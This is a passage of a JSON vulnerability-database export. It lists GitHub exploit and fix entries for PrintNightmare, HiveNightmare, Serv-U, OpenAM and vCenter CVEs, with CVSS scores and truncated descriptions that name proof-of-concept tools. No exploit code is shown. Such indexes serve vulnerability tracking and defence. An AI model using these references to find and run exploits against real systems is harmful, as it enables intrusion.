{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-26T13:53:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T13:10:07", "id": "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:37", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nTwo mini Script to check if th...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T12:12:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T07:49:06", "id": "F92F972D-7309-5D0B-BCC2-054883AE83E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:22", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-12T08:18:40", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:07:00", "id": "F1347375-6380-5145-9881-486B76875649", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:32", "description": "# Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmar...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T12:25:21", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:03:49", "id": "B8D9E2C0-202B-5806-88D2-B0E797582618", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T19:32:13", "description": "# Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-3...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:47:13", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-15T16:19:02", "id": "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T23:46:37", "description": "# CVE-2021-34527-CVE-2021-1675\nPrintNightmare+Manual\nhttps://sat...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-19T23:20:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-02-19T23:20:58", "id": "86F04665-0984-596F-945A-3CA176A53057", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T03:44:07", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-29T17:24:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T03:06:53", "id": "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:38:29", "description": "# Serv-U CVE-2021-35211 Exploit\n\n## Potential for DoS - check yo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T05:52:17", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Solarwinds Serv-U", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2023-11-25T19:38:18", "id": "15CF4822-F1E8-5BDB-8E65-8FC88F816E1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:02:55", "description": "# CVE-2021-36934\nFix for...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T13:06:51", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-06-18T04:00:43", "id": "C0AB02D4-4AD3-591D-A60F-953AC6D32CF0", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:04", "description": "CVE-2021\u201336934\n\nThe derived hash is used for forgery such as PTH...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T19:39:28", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-09-20T04:02:17", "id": "37A629E7-9341-5873-B641-E06D7998FA58", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:58", "description": "# Overview #\n\nThis is a Datto RMM component to mitigate CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T18:00:35", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-25T18:10:18", "id": "27F005C9-EA16-5734-81D4-8D66FA582FF9", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:03:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:49:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-11-30T06:53:48", "id": "F289C7E8-209B-5B15-B6D7-8EBFBBC8BDA8", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-15T12:42:04", "description": "# Invoke-HiveNightmare\nPowerShell-based PoC for CVE-2021-36934, ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T03:07:56", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-15T12:11:50", "id": "DA7FA6E3-30A8-5040-A7DA-7D9C064865B7", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:54:50", "description": "# PyNightmare\nPoC for CVE-2021-36934 Aka HiveNightmare/SeriousSA...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T00:31:11", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-12-31T15:22:31", "id": "5D86E24D-31EE-5EFA-9D3D-FDD9090FFDEE", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-12T07:32:45", "description": "# openam CVE-2021-35464\ntomcat \u6267\u884c\u547d\u4ee4\u56de\u663e.\n\n\u9879\u76ee\u57fa\u4e8e [ysoserial](https:/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T03:51:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Forgerock Am", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2022-07-12T07:10:41", "id": "2D7B9CB1-3FDE-5B73-A600-18F0A50BAD80", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:56:57", "description": "\ufffd\ufffd#\u0000 \u0000C\u0000V\u0000E\u0000-\u00002\u00000\u00002\u00001\u0000-\u00003\u00006\u00009\u00003\u00004\u0000\r\u0000\n\u0000\r\u0000\n\u0000#\u0000#\u0000 \u0000U\u0000s\u0000a\u0000g\u0000e\u0000\r\u0000\n\u0000\r\u0000...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T17:24:44", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-25T06:37:22", "id": "F1AD9ED7-3058-5CFE-81D5-BCB3AF0861B3", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:52:49", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell Fix\n\nThis powershell ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T12:24:24", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T06:47:23", "id": "F58F44AB-5B59-54F5-9E8E-9095AC51C919", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T22:01:35", "description": "# CVE-2021-22005\n# VMware vCenter Server\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\n\n## Code By:Jun...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T08:36:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-02-27T01:06:12", "id": "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-28T20:31:25", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-02T07:32:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-06-28T16:06:55", "id": "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:10", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell scripts\n\n* Detection....", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 